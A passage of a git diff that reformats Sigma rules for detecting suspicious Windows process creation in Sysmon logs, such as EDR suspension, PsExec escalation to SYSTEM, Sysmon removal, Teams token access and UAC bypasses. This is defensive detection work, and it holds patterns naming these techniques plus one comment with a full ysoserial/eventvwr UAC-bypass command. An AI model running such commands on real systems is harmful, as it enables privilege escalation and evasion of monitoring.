PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses references: - https://docs.microsoft.com/en-us/sysinternals/downloads/pssuspend - https://twitter.com/0gtweet/status/1638069413717975046 @@ -23,12 +22,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: pssuspend.exe - - Image|endswith: - - \pssuspend.exe - - \pssuspend64.exe + - OriginalFileName: pssuspend.exe + - Image|endswith: + - \pssuspend.exe + - \pssuspend64.exe selection_cli: - CommandLine|contains: msmpeng.exe + # Add more interesting/critical processes + CommandLine|contains: msmpeng.exe condition: process_creation and (all of selection_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_sdelete.yml b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_sdelete.yml index f27e5121e..041f4273d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_sdelete.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_sdelete.yml @@ -21,7 +21,7 @@ detection: selection: OriginalFileName: sdelete.exe filter: - CommandLine|contains: + CommandLine|contains: - ' -h' - ' -c' - ' -z' diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_susp_psexec_paexec_flags.yml b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_susp_psexec_paexec_flags.yml index a9a2778be..825cfbc0b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_susp_psexec_paexec_flags.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_susp_psexec_paexec_flags.yml @@ -1,11 +1,10 @@ title: Potential Privilege Escalation To LOCAL SYSTEM id: 207b0396-3689-42d9-8399-4222658efc99 related: - - id: 8834e2f7-6b4b-4f09-8906-d2276470ee23 - type: similar + - id: 8834e2f7-6b4b-4f09-8906-d2276470ee23 # PsExec specific rule + type: similar status: test -description: Detects unknown program using commandline flags usually used by tools - such as PsExec and PAExec to start programs with SYSTEM Privileges +description: Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges references: - https://docs.microsoft.com/en-us/sysinternals/downloads/psexec - https://www.poweradmin.com/paexec/ @@ -25,7 +24,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_flags_1: - CommandLine|contains: + # Escalation to LOCAL_SYSTEM + CommandLine|contains: + # Note that you don't need to add the ".exe" part when using psexec/paexec + # The "-" can also be replaced with "/" + # The order of args isn't important + # "cmd" can be replaced by "powershell", "pwsh" or any other console like software - ' -s cmd' - ' /s cmd' - ' -s -i cmd' @@ -36,6 +40,7 @@ detection: - ' /i /s cmd' - ' -i /s cmd' - ' /i -s cmd' + # Pwsh (For PowerShell 7) - ' -s pwsh' - ' /s pwsh' - ' -s -i pwsh' @@ -46,6 +51,7 @@ detection: - ' /i /s pwsh' - ' -i /s pwsh' - ' /i -s pwsh' + # PowerShell (For PowerShell 5) - ' -s powershell' - ' /s powershell' - ' -s -i powershell' @@ -57,14 +63,14 @@ detection: - ' -i /s powershell' - ' /i -s powershell' filter: - CommandLine|contains: + # This filter exclude strings covered by 8834e2f7-6b4b-4f09-8906-d2276470ee23 + CommandLine|contains: - paexec - PsExec - accepteula condition: process_creation and (1 of selection_flags_* and not filter) falsepositives: - Weird admins that rename their tools - - Software companies that bundle PsExec/PAExec with their software and rename - it, so that it is less embarrassing + - Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_sysmon_config_update.yml b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_sysmon_config_update.yml index 1e664a03d..ae2b0f235 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_sysmon_config_update.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_sysmon_config_update.yml @@ -1,9 +1,7 @@ title: Sysmon Configuration Update id: 87911521-7098-470b-a459-9a57fc80bdfd status: test -description: Detects updates to Sysmon's configuration. Attackers might update or - replace the Sysmon configuration with a bare bone one to avoid monitoring without - shutting down the service completely +description: Detects updates to Sysmon's configuration. Attackers might update or replace the Sysmon configuration with a bare bone one to avoid monitoring without shutting down the service completely references: - https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon author: Nasreddine Bencherchali (Nextron Systems) @@ -20,12 +18,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_pe: - - Image|endswith: - - \Sysmon64.exe - - \Sysmon.exe - - Description: System activity monitor + - Image|endswith: + - \Sysmon64.exe + - \Sysmon.exe + - Description: System activity monitor selection_cli: - CommandLine|contains: + CommandLine|contains: - -c - /c condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_sysmon_uninstall.yml b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_sysmon_uninstall.yml index 09b817916..76e43213d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_sysmon_uninstall.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_sysmon_uninstall.yml @@ -1,8 +1,7 @@ title: Uninstall Sysinternals Sysmon id: 6a5f68d1-c4b5-46b9-94ee-5324892ea939 status: test -description: Detects the removal of Sysmon, which could be a potential attempt at - defense evasion +description: Detects the removal of Sysmon, which could be a potential attempt at defense evasion references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-11---uninstall-sysmon author: frack113 @@ -20,17 +19,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_pe: - - Image|endswith: - - \Sysmon64.exe - - \Sysmon.exe - - Description: System activity monitor + - Image|endswith: + - \Sysmon64.exe + - \Sysmon.exe + - Description: System activity monitor selection_cli: - CommandLine|contains: + CommandLine|contains: - -u - /u condition: process_creation and (all of selection_*) falsepositives: - - Legitimate administrators might use this command to remove Sysmon for debugging - purposes + - Legitimate administrators might use this command to remove Sysmon for debugging purposes level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_tools_masquerading.yml b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_tools_masquerading.yml index e9330e144..626b31252 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_tools_masquerading.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_tools_masquerading.yml @@ -1,8 +1,7 @@ title: Potential Binary Impersonating Sysinternals Tools id: 7cce6fc8-a07f-4d84-a53e-96e1879843c9 status: test -description: Detects binaries that use the same name as legitimate sysinternals tools - to evade detection +description: Detects binaries that use the same name as legitimate sysinternals tools to evade detection references: - https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite author: frack113 @@ -173,7 +172,7 @@ detection: - Sysinternals - www.sysinternals.com - Sysinternals filter_empty: - Company: null + Company: condition: process_creation and (selection_exe and not 1 of filter*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysprep_appdata.yml b/sigma/sysmon/process_creation/proc_creation_win_sysprep_appdata.yml index e9661fd34..e7d0e0fe2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sysprep_appdata.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sysprep_appdata.yml @@ -1,8 +1,7 @@ title: Sysprep on AppData Folder id: d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e status: test -description: Detects suspicious sysprep process start with AppData folder as target - (as used by Trojan Syndicasec in Thrip report by Symantec) +description: Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec) references: - https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets - https://app.any.run/tasks/61a296bb-81ad-4fee-955f-3b399f4aaf4b @@ -22,10 +21,9 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \sysprep.exe - CommandLine|contains: \AppData\ + CommandLine|contains: \AppData\ condition: process_creation and selection falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative tools used in the monitored environment level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_systeminfo_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_systeminfo_execution.yml index 134e4734f..509797fdc 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_systeminfo_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_systeminfo_execution.yml @@ -20,8 +20,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \systeminfo.exe - - OriginalFileName: sysinfo.exe + - Image|endswith: \systeminfo.exe + - OriginalFileName: sysinfo.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml b/sigma/sysmon/process_creation/proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml index 4e032a4ae..218ba0f72 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml @@ -1,11 +1,10 @@ title: Potential Signing Bypass Via Windows Developer Features id: a383dec4-deec-4e6e-913b-ed9249670848 related: - - id: b110ebaf-697f-4da1-afd5-b536fa27a2c1 - type: similar + - id: b110ebaf-697f-4da1-afd5-b536fa27a2c1 + type: similar status: test -description: Detects when a user enable developer features such as "Developer Mode" - or "Application Sideloading". Which allows the user to install untrusted packages. +description: Detects when a user enable developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages. references: - Internal Research - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/ @@ -22,12 +21,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \SystemSettingsAdminFlows.exe - - OriginalFileName: SystemSettingsAdminFlows.EXE + - Image|endswith: \SystemSettingsAdminFlows.exe + - OriginalFileName: SystemSettingsAdminFlows.EXE selection_flag: - CommandLine|contains: TurnOnDeveloperFeatures + CommandLine|contains: TurnOnDeveloperFeatures selection_options: - CommandLine|contains: + CommandLine|contains: - DeveloperUnlock - EnableSideloading condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_takeown_recursive_own.yml b/sigma/sysmon/process_creation/proc_creation_win_takeown_recursive_own.yml index c1f96c63c..af70d4cc1 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_takeown_recursive_own.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_takeown_recursive_own.yml @@ -1,8 +1,7 @@ title: Suspicious Recursive Takeown id: 554601fb-9b71-4bcc-abf4-21a611be4fde status: test -description: Adversaries can interact with the DACLs using built-in Windows commands - takeown which can grant adversaries higher permissions on specific files and folders +description: Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/takeown - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md#atomic-test-1---take-ownership-using-takeown-utility @@ -22,7 +21,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \takeown.exe - CommandLine|contains|all: + CommandLine|contains|all: - '/f ' - /r condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_tapinstall_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_tapinstall_execution.yml index 89cf836be..c1524b45f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_tapinstall_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_tapinstall_execution.yml @@ -1,8 +1,7 @@ title: Tap Installer Execution id: 99793437-3e16-439b-be0f-078782cf953d status: test -description: Well-known TAP software installation. Possible preparation for data exfiltration - using tunneling techniques +description: Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques author: Daniil Yugoslavskiy, Ian Davis, oscd.community date: 2019/10/24 modified: 2023/12/11 diff --git a/sigma/sysmon/process_creation/proc_creation_win_tar_compression.yml b/sigma/sysmon/process_creation/proc_creation_win_tar_compression.yml index 374e86663..02ce3fbaf 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_tar_compression.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_tar_compression.yml @@ -1,11 +1,9 @@ title: Compressed File Creation Via Tar.EXE id: 418a3163-3247-4b7b-9933-dcfcb7c52ea9 status: experimental -description: 'Detects execution of "tar.exe" in order to create a compressed file. - +description: | + Detects execution of "tar.exe" in order to create a compressed file. Adversaries may abuse various utilities to compress or encrypt data before exfiltration. - - ' references: - https://unit42.paloaltonetworks.com/chromeloader-malware/ - https://lolbas-project.github.io/lolbas/Binaries/Tar/ @@ -26,10 +24,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \tar.exe - - OriginalFileName: bsdtar + - Image|endswith: \tar.exe + - OriginalFileName: bsdtar selection_create: - CommandLine|contains: + CommandLine|contains: - -c - -r - -u diff --git a/sigma/sysmon/process_creation/proc_creation_win_tar_extraction.yml b/sigma/sysmon/process_creation/proc_creation_win_tar_extraction.yml index 66defc65e..ff52aa94c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_tar_extraction.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_tar_extraction.yml @@ -1,11 +1,9 @@ title: Compressed File Extraction Via Tar.EXE id: bf361876-6620-407a-812f-bfe11e51e924 status: experimental -description: 'Detects execution of "tar.exe" in order to extract compressed file. - +description: | + Detects execution of "tar.exe" in order to extract compressed file. Adversaries may abuse various utilities in order to decompress data to avoid detection. - - ' references: - https://unit42.paloaltonetworks.com/chromeloader-malware/ - https://lolbas-project.github.io/lolbas/Binaries/Tar/ @@ -26,10 +24,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \tar.exe - - OriginalFileName: bsdtar + - Image|endswith: \tar.exe + - OriginalFileName: bsdtar selection_extract: - CommandLine|contains: -x + CommandLine|contains: -x condition: process_creation and (all of selection_*) falsepositives: - Likely diff --git a/sigma/sysmon/process_creation/proc_creation_win_taskkill_sep.yml b/sigma/sysmon/process_creation/proc_creation_win_taskkill_sep.yml index abd5bba73..665a02354 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_taskkill_sep.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_taskkill_sep.yml @@ -1,17 +1,10 @@ title: Taskkill Symantec Endpoint Protection id: 4a6713f6-3331-11ed-a261-0242ac120002 status: test -description: 'Detects one of the possible scenarios for disabling Symantec Endpoint - Protection. - - Symantec Endpoint Protection antivirus software services incorrectly implement - the protected service mechanism. - - As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command - several times ccSvcHst.exe /f, thereby killing the process belonging to the service, - and thus shutting down the service. - - ' +description: | + Detects one of the possible scenarios for disabling Symantec Endpoint Protection. + Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. + As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service. references: - https://www.exploit-db.com/exploits/37525 - https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection @@ -30,7 +23,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - taskkill - ' /F ' - ' /IM ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_tasklist_basic_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_tasklist_basic_execution.yml index 37d4fa2cc..b4910dca0 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_tasklist_basic_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_tasklist_basic_execution.yml @@ -1,9 +1,7 @@ title: Suspicious Tasklist Discovery Command id: 63332011-f057-496c-ad8d-d2b6afb27f96 status: test -description: Adversaries may attempt to get information about running processes on - a system. Information obtained could be used to gain an understanding of common - software/applications running on systems within the network +description: Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-2---process-discovery---tasklist author: frack113 @@ -21,9 +19,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - CommandLine|contains: tasklist - - Image|endswith: \tasklist.exe - - OriginalFileName: tasklist.exe + - CommandLine|contains: tasklist + - Image|endswith: \tasklist.exe + - OriginalFileName: tasklist.exe condition: process_creation and selection falsepositives: - Administrator, hotline ask to user diff --git a/sigma/sysmon/process_creation/proc_creation_win_taskmgr_localsystem.yml b/sigma/sysmon/process_creation/proc_creation_win_taskmgr_localsystem.yml index b84a51e9a..c15b2d337 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_taskmgr_localsystem.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_taskmgr_localsystem.yml @@ -17,7 +17,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - User|contains: + User|contains: # covers many language settings - AUTHORI - AUTORI Image|endswith: \taskmgr.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml b/sigma/sysmon/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml index 2310c8462..9f01dc21d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml @@ -1,13 +1,9 @@ title: Potentially Suspicious Command Targeting Teams Sensitive Files id: d2eb17db-1d39-41dc-b57f-301f6512fa75 status: experimental -description: 'Detects a commandline containing references to the Microsoft Teams database - or cookies files from a process other than Teams. - - The database might contain authentication tokens and other sensitive information - about the logged in accounts. - - ' +description: | + Detects a commandline containing references to the Microsoft Teams database or cookies files from a process other than Teams. + The database might contain authentication tokens and other sensitive information about the logged in accounts. references: - https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/ - https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens @@ -26,7 +22,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - \Microsoft\Teams\Cookies - \Microsoft\Teams\Local Storage\leveldb filter_main_legit_locations: diff --git a/sigma/sysmon/process_creation/proc_creation_win_tpmvscmgr_add_virtual_smartcard.yml b/sigma/sysmon/process_creation/proc_creation_win_tpmvscmgr_add_virtual_smartcard.yml index 7fd0d016b..7cd7278e7 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_tpmvscmgr_add_virtual_smartcard.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_tpmvscmgr_add_virtual_smartcard.yml @@ -20,7 +20,7 @@ detection: Image|endswith: \tpmvscmgr.exe OriginalFileName: TpmVscMgr.exe selection_cli: - CommandLine|contains: create + CommandLine|contains: create condition: process_creation and (all of selection_*) falsepositives: - Legitimate usage by an administrator diff --git a/sigma/sysmon/process_creation/proc_creation_win_tscon_localsystem.yml b/sigma/sysmon/process_creation/proc_creation_win_tscon_localsystem.yml index 357568f06..ec18c8bff 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_tscon_localsystem.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_tscon_localsystem.yml @@ -21,7 +21,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - User|contains: + User|contains: # covers many language settings - AUTHORI - AUTORI Image|endswith: \tscon.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_tscon_rdp_redirect.yml b/sigma/sysmon/process_creation/proc_creation_win_tscon_rdp_redirect.yml index d77baee97..bf120e040 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_tscon_rdp_redirect.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_tscon_rdp_redirect.yml @@ -23,7 +23,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: ' /dest:rdp-tcp#' + CommandLine|contains: ' /dest:rdp-tcp#' condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_tscon_rdp_session_hijacking.yml b/sigma/sysmon/process_creation/proc_creation_win_tscon_rdp_session_hijacking.yml index da180a230..8dea0edd2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_tscon_rdp_session_hijacking.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_tscon_rdp_session_hijacking.yml @@ -17,8 +17,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \tscon.exe - - OriginalFileName: tscon.exe + - Image|endswith: \tscon.exe + - OriginalFileName: tscon.exe selection_integrity: IntegrityLevel: SYSTEM condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml index 08a9ab71f..8053b703a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml @@ -1,8 +1,7 @@ title: UAC Bypass Using Disk Cleanup id: b697e69c-746f-4a86-9f59-7bfff8eab881 status: test -description: Detects the pattern of UAC Bypass using scheduled tasks and variable - expansion of cleanmgr.exe (UACMe 34) +description: Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34) references: - https://github.com/hfiref0x/UACME author: Christian Burkard (Nextron Systems) @@ -21,7 +20,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|endswith: '"\system32\cleanmgr.exe /autoclean /d C:' + CommandLine|endswith: '"\system32\cleanmgr.exe /autoclean /d C:' ParentCommandLine: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule IntegrityLevel: - High diff --git a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_cmstp.yml b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_cmstp.yml index b61630525..8504faeea 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_cmstp.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_cmstp.yml @@ -1,8 +1,7 @@ title: Bypass UAC via CMSTP id: e66779cc-383e-4224-a3a4-267eeb585c40 status: test -description: Detect commandline usage of Microsoft Connection Manager Profile Installer - (cmstp.exe) to install specially formatted local .INF files +description: Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files references: - https://eqllib.readthedocs.io/en/latest/analytics/e584f1a1-c303-4885-8a66-21360c90995b.html - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.003/T1218.003.md @@ -24,10 +23,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \cmstp.exe - - OriginalFileName: CMSTP.EXE + - Image|endswith: \cmstp.exe + - OriginalFileName: CMSTP.EXE selection_cli: - CommandLine|contains: + CommandLine|contains: - /s - -s - /au diff --git a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_cmstp_com_object_access.yml b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_cmstp_com_object_access.yml index 6b5f4a2b1..b0cacc30c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_cmstp_com_object_access.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_cmstp_com_object_access.yml @@ -1,8 +1,7 @@ title: CMSTP UAC Bypass via COM Object Access id: 4b60e6f2-bf39-47b4-b4ea-398e33cfe253 status: stable -description: Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile - Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65) +description: Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65) references: - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/ - https://twitter.com/hFireF0X/status/897640081053364225 @@ -30,11 +29,11 @@ detection: selection: ParentImage|endswith: \DllHost.exe ParentCommandLine|contains: - - ' /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}' - - ' /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}' - - ' /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}' - - ' /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}' - - ' /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}' + - ' /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}' # cmstplua.dll + - ' /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}' # CMLUAUTIL + - ' /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}' # EditionUpgradeManagerObj.dll + - ' /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}' # colorui.dll + - ' /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}' # wscui.cpl IntegrityLevel: - High - System diff --git a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_computerdefaults.yml b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_computerdefaults.yml index d871ab949..18a8fc902 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_computerdefaults.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_computerdefaults.yml @@ -1,8 +1,7 @@ title: UAC Bypass Tools Using ComputerDefaults id: 3c05e90d-7eba-4324-9972-5d7f711a60a8 status: test -description: Detects tools such as UACMe used to bypass UAC with computerdefaults.exe - (UACMe 59) +description: Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59) references: - https://github.com/hfiref0x/UACME author: Christian Burkard (Nextron Systems) diff --git a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml index 06d38d211..49caac2cc 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml @@ -1,8 +1,7 @@ title: UAC Bypass Using Consent and Comctl32 - Process id: 1ca6bd18-0ba0-44ca-851c-92ed89a61085 status: test -description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll - (UACMe 22) +description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22) references: - https://github.com/hfiref0x/UACME author: Christian Burkard (Nextron Systems) diff --git a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_dismhost.yml b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_dismhost.yml index 595822a9f..62f5eb1df 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_dismhost.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_dismhost.yml @@ -1,8 +1,7 @@ title: UAC Bypass Using DismHost id: 853e74f9-9392-4935-ad3b-2e8c040dae86 status: test -description: Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe - 63) +description: Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63) references: - https://github.com/hfiref0x/UACME author: Christian Burkard (Nextron Systems) diff --git a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_eventvwr_recentviews.yml b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_eventvwr_recentviews.yml index 97c36a887..a2f96e717 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_eventvwr_recentviews.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_eventvwr_recentviews.yml @@ -1,8 +1,8 @@ title: UAC Bypass Using Event Viewer RecentViews id: 30fc8de7-d833-40c4-96b6-28319fbc4f6c related: - - id: 63e4f530-65dc-49cc-8f80-ccfa95c69d43 - type: similar + - id: 63e4f530-65dc-49cc-8f80-ccfa95c69d43 + type: similar status: test description: Detects the pattern of UAC Bypass using Event Viewer RecentViews references: @@ -22,11 +22,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_path: - CommandLine|contains: + # Example: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe + CommandLine|contains: - \Event Viewer\RecentViews - \EventV~1\RecentViews selection_redirect: - CommandLine|contains: '>' + CommandLine|contains: '>' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_fodhelper.yml b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_fodhelper.yml index 300fe3e08..13f71f514 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_fodhelper.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_fodhelper.yml @@ -1,8 +1,7 @@ title: Bypass UAC via Fodhelper.exe id: 7f741dcf-fc22-4759-87b4-9ae8376676a2 status: test -description: Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries - use this technique to execute privileged processes. +description: Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes. references: - 